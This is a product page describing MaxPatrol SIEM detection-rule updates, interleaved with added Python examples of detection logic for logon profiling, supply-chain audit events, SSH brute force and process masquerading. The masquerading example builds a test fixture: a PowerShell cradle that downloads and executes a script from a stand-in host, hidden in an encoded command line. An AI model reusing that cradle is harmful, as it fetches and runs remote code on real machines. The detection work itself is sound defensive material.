
MaxPatrol SIEM

Product
Developers: Positive Technologies
Last Release Date: 2024/01/11
Technology: Information Security - Firewalls, Information Security - Information Leakage Prevention, Information Security - Security Information and Event Management (SIEM)



MaxPatrol is a security and compliance monitoring system developed by Positive Technologies. It provides an assessment of the security status of the entire information system as well as of individual departments, nodes and applications. Its Pentest, Audit and Compliance mechanisms, combined with support for analyzing various operating systems, DBMSs and web applications, allow MaxPatrol to provide continuous technical security audits at all levels of the information system.

2024: Adding 62 Risk Detection Rules

MaxPatrol SIEM has received 62 new detection rules, Positive Technologies reported on January 11, 2024. With them the information security event monitoring system detects, among other things, ransomware activity and further signs of hacker tools at work. In total, the following expertise packages were updated: "Attacks using specialized software", "Brute-force attacks", "Investigation of process starts in Windows", "Network devices. Indicators of compromise", and the MITRE ATT&CK tactic packages "Credential Access", "Execution", "Defense Evasion", "Collection", "Impact", "Lateral Movement", "Persistence", "Privilege Escalation", "Command and Control" and "Discovery".

Cybercriminals do not stand still: every day they improve their attack methods and develop new tools so that their actions remain unnoticed by security controls. Positive Technologies experts continuously monitor cyber attack trends, study specialized forums where malware and tools are developed and sold, and analyze public incident investigation reports (including those issued by the company's own expert security center). Based on current data on how attackers operate, Positive Technologies regularly updates the expertise in MaxPatrol SIEM.

The most important rules in published updates allow MaxPatrol SIEM users to detect:

  • typical ransomware actions, for example mass creation or modification of files by a single process;
  • additional signs of hacker tools already covered by earlier detections, among them PPLBlade, Powermad, NimExec and SharpHound, which is still actively used in attacks;
  • the popular techniques "loading third-party DLLs" (DLL side-loading, used by APT group malware to penetrate the network and elevate privileges) and "parent PID spoofing" (used by attackers to hide malicious actions by changing a process's parent), both from the Defense Evasion tactic of the MITRE ATT&CK matrix.

"PT Expert Security Center investigation experience shows that incidents involving data encryption or data wiping at enterprise infrastructure nodes were among the most common in 2021-2023 (21% of cases). The top three are Black Basta, Rhysida and LockBit, and ransomware operators continue to expand their arsenal," said Nikita Bazhenov, junior specialist in the knowledge base and information security expertise department at Positive Technologies. "Ransomware differs in that it quickly spreads from one node to others. With the updated expertise package, MaxPatrol SIEM users will receive a signal about the first computer attacked by the ransomware. By removing the virus in a timely manner, they will be able to stop the attack at an early stage and promptly investigate the incident."

To start using the latest rules and event enrichment mechanisms, you need to upgrade MaxPatrol SIEM to version 7.0 or higher and install the expertise package updates.

2023

MaxPatrol SIEM 8.0

On October 26, 2023, Positive Technologies announced the release of the eighth version of its information security event monitoring and incident detection system, MaxPatrol SIEM. The company expects the updated product to increase its presence by almost a third among companies that require very large installations (businesses from the RA600 list) and among government organizations tasked with adopting artificial intelligence technologies.


According to the company, the key changes are reduced hardware requirements, performance optimized to more than 540,000 events per second, and up to a sixfold increase in the volume or retention period of data thanks to the proprietary LogSpace DBMS.

The updated version of MaxPatrol SIEM significantly reduces hardware resource requirements: for example, deploying a system that processes up to 5,000 events per second now needs half as many processor cores (vCPU) and half as much RAM as before. This allows companies to cut equipment costs and simplifies installation. As of October 2023 these are important parameters for all Russian companies, given rising prices and the difficulty of buying equipment.

In addition, MaxPatrol SIEM's performance has been optimized: on a single core and with all expert rules enabled, the updated product processes more than 540,000 events per second. This makes it possible to monitor large event streams without degrading detection quality and without compromising on the choice of expertise packages. The higher performance enables effective cybersecurity for large geographically distributed infrastructures that consolidate hundreds of MaxPatrol SIEM components into a single monitoring point.

MaxPatrol SIEM 8.0 includes an ML behavioral analysis module, Behavioral Anomaly Detection (BAD), which identifies attacks that use the MITRE ATT&CK tactics Execution, Command and Control and Lateral Movement and confirms the triggering of the corresponding correlation rules. The ML module reduces the cognitive load on the SIEM analyst, allowing faster and more accurate decisions on an information security incident. BAD works as a second-opinion system. The module contains 38 built-in machine learning models developed from Positive Technologies' twenty years of incident investigation experience. BAD collects and analyzes data on events, users and processes in the context of events and assigns them a risk score.

"The expert content of MaxPatrol SIEM 8.0 and the product's integration with the behavioral anomaly detection module make it possible to detect both known and poorly understood attacks and anomalies. Monitoring many geographically distributed installations in single-window mode allows information security analysts to respond quickly even to such threats," said Ivan Prokhorov, Head of Product MaxPatrol SIEM, Positive Technologies.

Since version 7.0, the SIEM system has supported the LogSpace event store, developed by Positive Technologies. In this release, by reducing the size of information security events arriving in MaxPatrol SIEM, the volume or retention period of data in LogSpace has been increased sixfold compared to open source database management systems.

"We see market demand to reduce the requirements for processor power, RAM and the disk space needed to store events. The number of events that clients want to send to the SIEM system over the syslog protocol has grown many times over. In addition, more and more companies with large geographically distributed infrastructures are approaching us," said Roman Sergeyev, MaxPatrol SIEM Development Manager, Positive Technologies.

A number of changes in MaxPatrol SIEM are aimed at making information security analysts more efficient and comfortable when investigating incidents. The updated event card focuses on delivering additional information about related events from third-party services (both Positive Technologies' own and external) and on analyzing incident-related events without switching context. Data from third-party services is grouped and presented in MaxPatrol SIEM on one screen: the user does not need to switch to other windows or scroll. Context filters, built-in cross-service integration, updated search with PDQL queries and UX improvements together let the operator process each cyber incident without switching context up to twice as fast as in the previous version of the product.

To optimize the hypothesis testing task, integration with Positive Technologies products and third-party services has been expanded: cross-service requests can now be sent from the event card to PT Network Attack Discovery, PT Endpoint Detection and Response (PT EDR), RST Cloud, Whois7 and other systems.

In addition, cross-service requests can be sent from the event card to the PT Threat Analyzer subsystem. It helps build incident detection and prioritization around indicators of compromise: information about attackers and the tools they use. PT Threat Analyzer collects threat data from various sources, including the PT Threat Intelligence Feeds service and other commercial and open data sources.

Add 44 rules that profile user actions in the infrastructure

44 additional correlation rules are available in the MaxPatrol SIEM information security event monitoring system that profile user actions in the infrastructure and identify atypical connections to corporate nodes and services. The product tracks access to the computers of top managers and developers, to domain controllers, GitLab servers, password managers and other applications. Positive Technologies announced this on August 22, 2023.

"Our experience in conducting cyber exercises has shown that profiling access to critical nodes is the only way to detect authorization in corporate services from previously unknown IP addresses and devices and to stop an attack at an early stage if a credential dump appears on the network. Such deviations, as a rule, indicate that the employee's account has been taken over and that cybercriminals have remotely connected to the infrastructure and moved within it," said Kirill Kiryanov, head of the endpoint attack detection group, Positive Technologies. "With this expertise package, MaxPatrol SIEM operators are able to catch atypical activity that may look legitimate in general terms but is abnormal for a specific infrastructure and therefore poses a security threat."

With the added rules, the product analyzes user authorization on target infrastructure nodes and in various applications, including GitLab servers, 1C products, password managers and domain controllers, as well as on the computers of top managers, developers and other critical users, whose compromise may allow attackers to bring about events the company considers unacceptable.

A total of three profiling modes have been implemented:

  • passive collection of information about which corporate services each employee uses (no correlation rules are triggered);
  • automatic profiling with login notification: MaxPatrol SIEM notifies the operator of new authorizations in corporate services and remembers the "device IP address + user name" combinations, after which these events are no longer reported;
  • strict profiling: data collection on user actions in the infrastructure is complete, and the SIEM system immediately notifies the information security analyst of any access that deviates from the norm.
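The three modes above, as an added example in Python that is not MaxPatrol SIEM code: a minimal access profiler that learns which source IP each user logs in from on a set of tracked hosts, and reports deviations according to the selected mode. The event dictionaries are a constructed stand-in for normalized Windows Security or auditd logon events; field names (`user`, `src_ip`, `dst_host`, `outcome`) are assumptions of this example.

```python
# Added example, not MaxPatrol SIEM code. Event fields are a constructed
# stand-in for normalized Windows Security / auditd logon events.
from collections import defaultdict
from enum import Enum
from typing import Dict, List, Optional, Set, Tuple


class Mode(Enum):
    PASSIVE = "passive"    # collect who logs in where; never alert
    LEARNING = "learning"  # alert once per new (host, user, src_ip) triple, then remember it
    STRICT = "strict"      # profile is frozen; alert on every triple not already learned


class AccessProfiler:
    def __init__(self, mode: Mode, critical_hosts: Set[str]):
        self.mode = mode
        self.critical_hosts = critical_hosts
        # profile[(host, user)] -> set of source IPs seen logging in as that user
        self.profile: Dict[Tuple[str, str], Set[str]] = defaultdict(set)

    def process(self, ev: dict) -> Optional[str]:
        """Feed one logon event; return an alert string or None."""
        # Only successful logons to tracked hosts shape the profile or raise alerts.
        if ev["outcome"] != "success" or ev["dst_host"] not in self.critical_hosts:
            return None
        key = (ev["dst_host"], ev["user"])
        known = ev["src_ip"] in self.profile[key]
        if self.mode is Mode.PASSIVE:
            self.profile[key].add(ev["src_ip"])
            return None
        if known:
            return None
        if self.mode is Mode.LEARNING:
            self.profile[key].add(ev["src_ip"])  # remember it and report it once
            return f"new login: {ev['user']} -> {ev['dst_host']} from {ev['src_ip']}"
        # STRICT: nothing is learned any more; every unseen source is an incident
        return f"ANOMALOUS login: {ev['user']} -> {ev['dst_host']} from {ev['src_ip']}"


def run(profiler: AccessProfiler, events: List[dict]) -> List[str]:
    """Push a stream of events through the profiler and collect the alerts."""
    return [alert for alert in map(profiler.process, events) if alert]


# Constructed sample stream: ts 1-4 is the known baseline, ts 5-7 is new activity.
CRITICAL_HOSTS = {"ceo-laptop", "gitlab", "dc01"}
SAMPLE_EVENTS = [
    {"ts": 1, "user": "ceo", "src_ip": "10.1.1.10", "dst_host": "ceo-laptop", "outcome": "success"},
    {"ts": 2, "user": "dev1", "src_ip": "10.2.2.20", "dst_host": "gitlab", "outcome": "success"},
    {"ts": 3, "user": "dev1", "src_ip": "10.2.2.20", "dst_host": "gitlab", "outcome": "success"},
    {"ts": 4, "user": "svc_backup", "src_ip": "10.3.3.30", "dst_host": "dc01", "outcome": "success"},
    {"ts": 5, "user": "dev1", "src_ip": "203.0.113.7", "dst_host": "gitlab", "outcome": "failure"},
    {"ts": 6, "user": "dev1", "src_ip": "203.0.113.7", "dst_host": "gitlab", "outcome": "success"},
    {"ts": 7, "user": "dev2", "src_ip": "10.2.2.21", "dst_host": "fileshare", "outcome": "success"},
]


def strict_after_baseline(events: List[dict], baseline_len: int) -> List[str]:
    """Learn passively from the first baseline_len events, then switch to STRICT."""
    profiler = AccessProfiler(Mode.PASSIVE, CRITICAL_HOSTS)
    run(profiler, events[:baseline_len])
    profiler.mode = Mode.STRICT
    return run(profiler, events[baseline_len:])


if __name__ == "__main__":
    print(run(AccessProfiler(Mode.LEARNING, CRITICAL_HOSTS), SAMPLE_EVENTS))
    print(strict_after_baseline(SAMPLE_EVENTS, 4))
```

The failed attempt at ts 5 is deliberately ignored: a failure from a new address is a brute-force question, not a profiling one, and only the successful logon at ts 6 (dev1 reaching GitLab from an address never seen for that user) deviates from the baseline. The non-critical host at ts 7 is never profiled.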

Data for building profiles comes from application logs, as well as from auditd and Windows Security logs on specific nodes. MaxPatrol SIEM is built on security asset management technology, which collects data on all assets and makes the IT infrastructure transparent to the operator. The product can automatically identify critical servers in the infrastructure and profile user access to them, or the information security analyst can manually add nodes whose access it is important to track.

The activity profiling feature is available in MaxPatrol SIEM version 7.0 and later.

In addition, the MaxPatrol SIEM expertise packages for identifying attacks on the MITRE ATT&CK matrix have been updated. In particular, Positive Technologies experts have developed rules to detect LSASS process dumps made with the hacker utilities PPLMedic and PPLFault, popular among cybercriminals, as well as an enrichment rule that decodes Base64 in command lines; attackers use such encoding to hide their actions.

Add an Expert Review Package to Identify Supply Chain Attacks

Another expertise package for MaxPatrol SIEM allows companies to counter threats related to supply chain attacks. Such attacks target software developers and suppliers, through whose products cybercriminals gain access to the infrastructure of their ultimate target. Positive Technologies announced this on July 28, 2023.

According to the Positive Technologies Expert Security Center (PT ESC), 20% of all attacks recorded in 2022 were supply chain and trusted relationship attacks; the resources of well-known organizations such as AMD, Cisco, Cloudflare, Microsoft, Nvidia and Samsung were affected. In the first six months of 2023 such attacks accounted for about 30% of cases.

"For software vendors, the realization of supply chain threats is unambiguously an unacceptable event. This is relevant for us and for many other IT companies," said Danil Zaripov, an expert at the PT Expert Security Center. "Such incidents can lead to reputational and financial losses, termination of contractual obligations with customers and theft of the developer's intellectual property."

The expertise package added to MaxPatrol SIEM is based on three main event sources that are usually closely linked: GitLab repositories, the TeamCity build infrastructure and the JFrog Artifactory artifact repository. The rules identify, in particular, adding code to an important branch without approval, changing such a branch through the web interface and removing protection from it, approving one's own merge request, mass creation of privileged accounts, suspicious actions by new users, changes to the TeamCity build configuration, and actions in JFrog Artifactory indicative of a dependency confusion attack (CVE-2021-29427). Such activity can lead to illegitimate changes to code stored in protected, release or main (master) branches.
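The rule set described above, as an added example in Python that is not Positive Technologies' code: simple correlation rules over a constructed, simplified audit-event schema for GitLab, TeamCity and Artifactory. The field names (`action`, `actor`, `mr_author`, `repo_type` and so on) are assumptions of this example; real GitLab, TeamCity and Artifactory audit events use different names and must be normalized first.

```python
# Added example, not MaxPatrol SIEM code. The event schema is a constructed,
# simplified normalization of GitLab / TeamCity / Artifactory audit events.
from collections import defaultdict
from typing import Dict, List, Set

PROTECTED = {"main", "master", "release"}


def gitlab_rules(ev: dict) -> List[str]:
    out = []
    if ev["action"] == "mr.approved" and ev["actor"] == ev["mr_author"]:
        out.append(f"self-approval of MR !{ev['mr']} by {ev['actor']}")
    if ev["action"] == "push" and ev["branch"] in PROTECTED and ev.get("approvals", 0) == 0:
        out.append(f"unapproved push to protected branch {ev['branch']} by {ev['actor']}")
    if ev["action"] == "branch.edit" and ev["branch"] in PROTECTED and ev.get("via") == "web_ui":
        out.append(f"protected branch {ev['branch']} changed via web UI by {ev['actor']}")
    if ev["action"] == "protected_branch.removed":
        out.append(f"protection removed from {ev['branch']} by {ev['actor']}")
    return out


def teamcity_rules(ev: dict) -> List[str]:
    # Build steps are where an attacker injects a command into every release build.
    if ev["action"] == "build_config.edit" and ev.get("changed_field") == "build_steps":
        return [f"TeamCity build steps of {ev['config']} changed by {ev['actor']}"]
    return []


def artifactory_rules(ev: dict, local_packages: Set[str]) -> List[str]:
    # Dependency confusion: a package name that exists in the internal (local)
    # repository is resolved from a remote (public) repository instead.
    if ev["action"] == "resolve" and ev["repo_type"] == "remote" and ev["package"] in local_packages:
        return [f"dependency confusion: {ev['package']} resolved from remote {ev['repo']} by {ev['actor']}"]
    return []


def mass_admin_creation(events: List[dict], threshold: int = 3, window: int = 600) -> List[str]:
    """Same actor creating >= threshold admin users within `window` seconds."""
    by_actor: Dict[str, List[int]] = defaultdict(list)
    for ev in events:
        if ev["action"] == "user.create" and ev.get("admin"):
            by_actor[ev["actor"]].append(ev["ts"])
    alerts = []
    for actor, times in by_actor.items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                alerts.append(f"mass privileged account creation by {actor}")
                break
    return alerts


def evaluate(events: List[dict], local_packages: Set[str]) -> List[str]:
    """Run every per-event rule, then the windowed rule, and return all alerts."""
    alerts: List[str] = []
    for ev in events:
        if ev["source"] == "gitlab":
            alerts += gitlab_rules(ev)
        elif ev["source"] == "teamcity":
            alerts += teamcity_rules(ev)
        elif ev["source"] == "artifactory":
            alerts += artifactory_rules(ev, local_packages)
    alerts += mass_admin_creation([e for e in events if e["source"] == "gitlab"])
    return alerts


# Constructed sample: one rogue maintainer account "eve" plus one poisoned resolve.
LOCAL_PACKAGES = {"acme-auth-lib", "acme-billing"}
SAMPLE_EVENTS = [
    {"ts": 100, "source": "gitlab", "action": "mr.approved", "actor": "eve", "mr_author": "eve", "mr": 42},
    {"ts": 110, "source": "gitlab", "action": "push", "actor": "eve", "branch": "main", "approvals": 0},
    {"ts": 120, "source": "gitlab", "action": "push", "actor": "alice", "branch": "feature/x", "approvals": 0},
    {"ts": 130, "source": "gitlab", "action": "protected_branch.removed", "actor": "eve", "branch": "release"},
    {"ts": 140, "source": "gitlab", "action": "user.create", "actor": "eve", "admin": True},
    {"ts": 150, "source": "gitlab", "action": "user.create", "actor": "eve", "admin": True},
    {"ts": 160, "source": "gitlab", "action": "user.create", "actor": "eve", "admin": True},
    {"ts": 170, "source": "teamcity", "action": "build_config.edit", "actor": "eve",
     "config": "Acme_Release", "changed_field": "build_steps"},
    {"ts": 180, "source": "artifactory", "action": "resolve", "actor": "ci-bot",
     "package": "acme-auth-lib", "repo": "npm-remote", "repo_type": "remote"},
    {"ts": 190, "source": "artifactory", "action": "resolve", "actor": "ci-bot",
     "package": "lodash", "repo": "npm-remote", "repo_type": "remote"},
]

if __name__ == "__main__":
    for alert in evaluate(SAMPLE_EVENTS, LOCAL_PACKAGES):
        print(alert)
```

The Artifactory rule is the one worth tuning in practice: it needs the current list of internal package names as context (an asset-like lookup), otherwise a public package that merely shares a prefix with internal ones produces noise.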

The MaxPatrol SIEM rules cover the following MITRE ATT&CK techniques: Supply Chain Compromise (Initial Access tactic), Valid Accounts (Initial Access and Privilege Escalation tactics), Data from Local System (Collection tactic) and Defacement (Impact tactic).

Add 70 rules to detect Unix infrastructure attacks

MaxPatrol SIEM has received more than 70 rules for detecting attacks on Unix infrastructures. This was announced on July 10, 2023 by Positive Technologies.

In total, the MaxPatrol SIEM information security event monitoring system has received more than 100 new threat detection rules as part of the update of examination packages, of which over 70 are focused on detecting attacks on Unix infrastructures. The added rules improve the accuracy of detecting brute-force attempts, as well as attacks on Unix operating systems.

To help government agencies, critical information infrastructure entities and domestic companies with Unix infrastructures secure them, Positive Technologies experts have added ways to detect current threats in MaxPatrol SIEM. The rules loaded into the product allow more accurate identification of MITRE ATT&CK techniques that cybercriminals use for credential access, initial access and lateral movement, defense evasion, discovery and collection, persistence and privilege escalation, execution, and command and control.

In addition, as part of the update MaxPatrol SIEM received rules for detecting attempts to break into accounts by guessing logins and passwords. In particular, the product now separately distinguishes password spraying (trying one password against many accounts, which attackers do to avoid account lockouts). Each brute-force rule is tied to a specific application, operating system or network device, for example the IIS web server, the Cisco firewall, OpenVPN and GitLab.

Unix underlies or has inspired several dozen operating systems, including Linux. Most web servers, cloud services and popular virtualization tools run on Unix-like systems. Given import substitution in Russia, demand for such operating systems, and the number of cyber attacks on them, will grow.

"With the added rules, MaxPatrol SIEM identifies cases of successful credential guessing. If, as a result of brute force, the attackers managed to find the correct login and password, this is a critical incident that requires a lightning-fast response from an information security specialist. Whether the attacker has time to develop the attack and reach the system of interest depends on the speed of the operator's reaction," said Yulia Fomina, lead specialist in the endpoint attack detection group, PT Expert Security Center.
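The brute-force versus password-spraying distinction, and the escalation to a critical incident when a success follows the failures, as an added example in Python that is not Positive Technologies' code. The rules in the product are tied to specific applications; this example covers only the sshd case, over constructed syslog-style lines, and the thresholds (10 failures in 300 seconds, 5 or more distinct users with at most 2 attempts each for spraying) are assumptions of the example.

```python
# Added example, not MaxPatrol SIEM code. Log lines are constructed in the
# shape of OpenSSH auth messages, prefixed with a numeric timestamp.
import re
from collections import defaultdict
from typing import Dict, List, Optional

LINE = re.compile(
    r"^(?P<ts>\d+) sshd\[\d+\]: (?P<result>Accepted|Failed) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)"
)


def parse(lines: List[str]) -> List[dict]:
    """Normalize raw lines into {ts, ok, user, ip}; unrecognized lines are dropped."""
    events = []
    for line in lines:
        m = LINE.match(line)
        if m:
            events.append({"ts": int(m["ts"]), "ok": m["result"] == "Accepted",
                           "user": m["user"], "ip": m["ip"]})
    return events


def classify(events: List[dict], window: int = 300, min_attempts: int = 10,
             spray_min_users: int = 5) -> Dict[str, Optional[str]]:
    """Per source IP: 'spraying', 'brute_force' or None, with '+critical'
    appended when a successful logon followed the failures from that source."""
    by_ip: Dict[str, List[dict]] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_ip[ev["ip"]].append(ev)

    verdicts: Dict[str, Optional[str]] = {}
    for ip, evs in by_ip.items():
        fails = [e for e in evs if not e["ok"]]
        verdict = None
        for i in range(len(fails)):
            # Failures inside a window starting at the i-th failure.
            win = [e for e in fails[i:] if e["ts"] - fails[i]["ts"] <= window]
            if len(win) < min_attempts:
                continue
            per_user: Dict[str, int] = defaultdict(int)
            for e in win:
                per_user[e["user"]] += 1
            # Spraying: many accounts, very few tries each (stays under lockout).
            if len(per_user) >= spray_min_users and max(per_user.values()) <= 2:
                verdict = "spraying"
            else:
                verdict = "brute_force"
            break
        if verdict:
            first_fail = fails[0]["ts"]
            # A success after the guessing started means the credentials were found.
            if any(e["ok"] and e["ts"] > first_fail for e in evs):
                verdict += "+critical"
        verdicts[ip] = verdict
    return verdicts


# Constructed sample log: a classic brute force that succeeds, a spray, and a
# user who simply mistyped twice.
SPRAY_USERS = ["alice", "bob", "carol", "dave", "erin", "frank", "grace", "heidi", "ivan", "judy"]
SAMPLE_LOG = (
    [f"{t} sshd[100]: Failed password for root from 198.51.100.9 port 4{t} ssh2" for t in range(1, 11)]
    + ["11 sshd[100]: Accepted password for root from 198.51.100.9 port 411 ssh2"]
    + [f"{20 + i} sshd[101]: Failed password for invalid user {u} from 203.0.113.4 port 5{i} ssh2"
       for i, u in enumerate(SPRAY_USERS)]
    + ["40 sshd[102]: Failed password for alice from 10.0.0.5 port 60 ssh2",
       "41 sshd[102]: Failed password for alice from 10.0.0.5 port 61 ssh2",
       "42 sshd[102]: Accepted password for alice from 10.0.0.5 port 62 ssh2"]
)

if __name__ == "__main__":
    print(classify(parse(SAMPLE_LOG)))
```

The "+critical" suffix is what turns a noisy brute-force trigger into the incident the quote above describes: the source that succeeded after guessing needs a response before the attacker moves on from the foothold.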

MaxPatrol SIEM's integration with the PT Network Attack Discovery (PT NAD) behavioral traffic analysis system has been expanded: users can now see even more correlations (over 3,500) between SIEM rules and critical PT NAD rules. This reduces the number of false positives and increases the accuracy of detecting suspicious network activity. In addition, with the updated expertise package, companies using both products can create subnet whitelists and automatically disable rule triggering for groups of dynamically assigned IP addresses. For example, whitelisting can be used for R&D networks or vulnerability scanner networks when the company does internal development.

Add event enrichment mechanisms

Positive Technologies' information security event monitoring system MaxPatrol SIEM has received new detection rules. Additional event enrichment mechanisms have appeared: they help information security analysts confirm up to 90% of incidents without additional data requests. PT announced this on May 30, 2023. MaxPatrol SIEM now detects attacks on the domestic ClickHouse DBMS, as well as signs of five more popular hacker tools: Sliver, NimPlant, Masky, PowerView and Evil-WinRM.

Positive Technologies specialists are constantly investigating new cyber threats, monitoring the activity of hacker groups around the world, studying their tactics and techniques. Based on this data, experts create ways to identify threats that are regularly transmitted to MaxPatrol SIEM as examination packages. Thanks to this, SIEM users can detect current threats and quickly respond to the actions of cybercriminals who are continuously developing new attack tools, methods and techniques, as well as improving previously created ones.

Positive Technologies experts have developed event enrichment mechanisms for MaxPatrol SIEM. These mechanisms independently look up the dynamic data that arises as an attack develops, in order to give information security analysts the full context of the launched processes (earlier, MaxPatrol SIEM had added a mechanism for automatically building process chains).

"Additional context in MaxPatrol SIEM helps detect malicious activity. The more context there is in the event cards, the easier it is for information security specialists to "unwind" attacks. The mechanism for building chains of launched processes that we added earlier removed most routine tasks from SOC analysts, so we continued working in this direction," said Kirill Kiryanov, head of the endpoint attack detection group, Positive Technologies. "To make incident investigation even easier, faster and more efficient, we created additional enrichment mechanisms. They provide extended context that helps operators verify up to 90% of incidents, eliminating the need for additional queries in the system."

The company's experts have updated previously loaded packages for identifying hacker tools and masquerading techniques. The rules added to MaxPatrol SIEM detect the work of the increasingly popular Sliver and NimPlant tools, attempts to exploit the ProxyNotShell vulnerabilities with the corresponding Metasploit module, and the activity of the Masky, PowerView and Evil-WinRM frameworks, which remain part of the cybercriminal arsenal.

With the added rules, MaxPatrol SIEM also detects advanced techniques for hiding attackers in the infrastructure, in particular:

  • running processes without an extension: used both for masquerading and to bypass correlation rules that explicitly look for processes with an .exe extension;
  • running processes with a double extension, for example .docx.exe: attackers use this method in phishing;
  • loading processes or libraries that carry a Microsoft signature whose signature status is not valid: attackers use this to disguise their tools as legitimate Microsoft programs.
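The three masquerading checks above, together with the Base64 command-line decoding enrichment mentioned in the August 2023 update, as an added example in Python that is not Positive Technologies' code. Field names follow Sysmon's `Image`, `CommandLine`, `Signature` and `SignatureStatus` loosely; the sample events and the extension lists are constructed assumptions of this example.

```python
# Added example, not MaxPatrol SIEM code. Sample events are constructed and
# use Sysmon-like field names (Image, CommandLine, Signature, SignatureStatus).
import base64
import ntpath
from typing import List, Optional

EXEC_EXT = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs", ".hta"}
DECOY_EXT = {".doc", ".docx", ".xls", ".xlsx", ".pdf", ".jpg", ".png", ".txt", ".rtf"}


def check_image_name(image: str) -> List[str]:
    """Extension-based masquerading: no extension, or document.exe-style double extension."""
    findings = []
    parts = ntpath.basename(image).lower().split(".")
    if len(parts) == 1:
        findings.append("process without extension")
    elif len(parts) >= 3 and "." + parts[-1] in EXEC_EXT and "." + parts[-2] in DECOY_EXT:
        findings.append(f"double extension .{parts[-2]}.{parts[-1]}")
    return findings


def check_signature(signature: Optional[str], status: Optional[str]) -> List[str]:
    # A Microsoft signer name whose signature does not verify: the binary
    # claims to be Microsoft's, but the signature check says otherwise.
    if signature and "microsoft" in signature.lower() and status != "Valid":
        return [f"Microsoft-signed image with signature status {status!r}"]
    return []


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a powershell -EncodedCommand argument, if present."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lstrip("-/").lower()
        # powershell.exe accepts -e, -ec and any unambiguous prefix of -EncodedCommand
        if flag in ("e", "ec") or (len(flag) >= 3 and "encodedcommand".startswith(flag)):
            try:
                raw = base64.b64decode(tokens[i + 1], validate=True)
                return raw.decode("utf-16-le")  # PowerShell encodes the script as UTF-16LE
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def analyze_process_event(ev: dict) -> dict:
    """Apply all checks to one process-start event; return findings and decoded command line."""
    findings = check_image_name(ev["Image"])
    findings += check_signature(ev.get("Signature"), ev.get("SignatureStatus"))
    decoded = decode_encoded_command(ev.get("CommandLine", ""))
    if decoded is not None:
        findings.append("base64-encoded PowerShell command")
    return {"findings": findings, "decoded_command": decoded}


# Constructed payload and events. The encoded string is generated here rather
# than pasted, so the decoder is exercised on a known plaintext.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"Image": r"C:\Users\bob\AppData\Local\Temp\svchost", "CommandLine": "svchost"},
    {"Image": r"C:\Users\bob\Downloads\invoice.docx.exe", "CommandLine": "invoice.docx.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -NoP -W Hidden -enc {ENCODED}"},
    {"Image": r"C:\ProgramData\update.exe", "CommandLine": "update.exe",
     "Signature": "Microsoft Windows", "SignatureStatus": "Invalid"},
    {"Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe readme.txt",
     "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ntpath.basename(ev["Image"]), analyze_process_event(ev))
```

The decoder returns the plaintext rather than raising an alert on its own: the enrichment's job is to put the decoded command line into the event card, so that the existing rules (and the analyst) see the download cradle instead of a Base64 blob.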

As part of the large-scale expertise update, the product also received a package of rules for detecting suspicious activity in the domestic ClickHouse database management system. The package includes more than 20 correlation rules that help quickly detect an attack at various stages, from reconnaissance to attempts to export data from the DBMS or destroy it. The added expertise will help Russian companies that use ClickHouse, or plan to switch to it as part of import substitution, secure their critical data. Earlier, rule sets for detecting attacks on PostgreSQL, Oracle Database, Microsoft SQL Server and MongoDB were loaded into MaxPatrol SIEM.

To start using the new rules and event enrichment mechanisms, you need to upgrade MaxPatrol SIEM to version 7.0 and install the expertise package updates.

Add more than 70 rules to monitor information security events on resources in Yandex Cloud

MaxPatrol SIEM has expanded its integration with Yandex Cloud and with Yandex Audit Trails, the service for collecting and exporting audit logs from the cloud. Positive Technologies announced this on April 13, 2023. The first expertise package for identifying suspicious activity on resources hosted by users in Yandex Cloud was added to MaxPatrol SIEM in 2022. Updates to this package have now been loaded into MaxPatrol SIEM, including over 50 event normalization rules and 20 correlation rules; the updated package contains more than 100 rules. This supports even more security audit events in Yandex Cloud, whose services are used daily by over 24,000 companies.

The added correlation and normalization rules detect early attempts by attackers to gain illegitimate access to resources hosted on the cloud platform. The rules help information security specialists navigate the dense flow of events, and the MaxPatrol SIEM interface allows them to monitor the status of detected threats in single-window mode. This improves security when using Yandex Cloud services.

"The list of rules was developed with the expert support of Yandex Cloud specialists, taking into account their recommendations on the choice of security events. One of the key changes in these updates is native support for Kubernetes logs, which will detect attempts to compromise cloud environments more accurately," said David Nikachadze, specialist in the knowledge base and information security expertise department, Positive Technologies.

Using the rules added to the examination package, MaxPatrol SIEM detects:

  • Yandex Managed Service for Kubernetes: an illegitimate connection to the Kubernetes cluster from an external address, which may be an attempt by attackers to gain access to cloud resources.
  • Yandex Resource Manager: illegitimate assignment of administrative rights to a folder or cloud.
  • Yandex Cloud Organization: illegitimate assignment of the right to manage IAM group membership.
  • Yandex Virtual Private Cloud: assignment of an unsafe access control list to a security group, which can expose the infrastructure to compromise.
  • Yandex Virtual Private Cloud: creation of a public IP address without DDoS protection, which leaves services vulnerable to denial-of-service attacks.
  • Managed database services: logging disabled in a cluster, which may indicate an attacker's attempt to hide their actions.
  • Creation of resources (virtual machines, database clusters, Kubernetes clusters, application load balancers) without security groups, leaving them with no rules restricting inbound and outbound traffic.

To start using the new rules, you need to update MaxPatrol SIEM to version 7.0, install the expertise package update and follow the instructions for configuring the collection of Yandex Cloud and Kubernetes events.

Mechanism for automating the construction of chains of started processes

On February 28, 2023, Positive Technologies announced an updated MaxPatrol SIEM expertise package that includes a mechanism for building chains of launched processes, saving information security analysts 5 to 10 minutes on the analysis of each correlation rule trigger. The mechanism, developed by Positive Technologies experts, automatically enriches a correlated event that contains a process name and identifier with the process's full chain. This additional context, which helps detect malicious activity, is displayed in the event card.


As reported, many detection rules in SIEM systems are based on events that contain process start information. When verifying triggers, operators spend a lot of time "unwinding" the chains of started processes: besides the most suspicious process, they also analyze the processes that spawned it and those it launched later.

